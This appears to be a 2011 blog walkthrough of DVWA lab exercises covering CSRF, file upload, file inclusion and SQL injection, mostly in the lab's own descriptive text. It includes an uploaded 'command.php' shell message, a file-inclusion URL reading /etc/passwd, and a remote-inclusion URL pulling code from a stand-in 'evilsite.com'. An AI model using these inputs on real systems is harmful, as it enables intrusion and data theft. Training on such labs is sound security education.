2/18/2011

DVWA-Cross Site Request Forgery (CSRF) : LOW Level



CSRF is an attack which forces an end user to execute unwanted actions on a web application in which he/she is currently authenticated. With a little help of social engineering (like sending a link via email/chat), an attacker may force the users of a web application to execute actions of the attacker's choosing. A successful CSRF exploit can compromise end user data and operation in case of normal user. If the targeted end user is the administrator account, this can compromise the entire web application.

DVWA-FILE UPLOAD : LOW Level

Uploaded files represent a significant risk to applications. The first step in many attacks is to get some code to the system to be attacked. Then the attack only needs to find a way to get the code executed. Using a file upload helps the attacker accomplish the first step.

The consequences of unrestricted file upload can vary, including complete system takeover, an overloaded file system, forwarding attacks to backend systems, and simple defacement. It depends on what the application does with the uploaded file, including where it is stored.

Another thing worth looking for are restrictions within 'hidden' form fields.


../../hackable/uploads/command.php succesfully uploaded!

DVWA-FILE INCLUSION : LOW Level

Some web applications allow the user to specify input that is used directly into file streams or allows the user to upload files to the server. At a later time the web application accesses the user supplied input in the web applications context. By doing this, the web application is allowing the potential for malicious file execution.

Local Example: http://127.0.0.1/dvwa/fi/?page=../../../../../../etc/passwd

or

Remote Example: http://127.0.0.1/dvwa/fi/?page=http://www.evilsite.com/evil.php



< ? php $file = $_GET['page']; //The page we wish to display ? >

DVWA-BLIND SQL INJECTION : LOW Level


When an attacker executes SQL Injection attacks, sometimes the server responds with error messages from the database server complaining that the SQL Query's syntax is incorrect. Blind SQL injection is identical to normal SQL Injection except that when an attacker attempts to exploit an application, rather then getting a useful error message, they get a generic page specified by the developer instead. This makes exploiting a potential SQL Injection attack more difficult but not impossible. An attacker can still steal data by asking a series of True and False questions through SQL statements.

The 'id' variable within this PHP script is vulnerable to SQL injection.

There are 5 users in the database, with id's from 1 to 5. Your mission... to steal passwords!

If you have received a Magicquotes error, turn them off in php.ini.

2/17/2011

DVWA-SQL INJECTION : LOW Level



A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system. SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to effect the execution of predefined SQL commands.

The 'id' variable within this PHP script is vulnerable to SQL injection.

There are 5 users in the database, with id's from 1 to 5. Your mission... to steal passwords!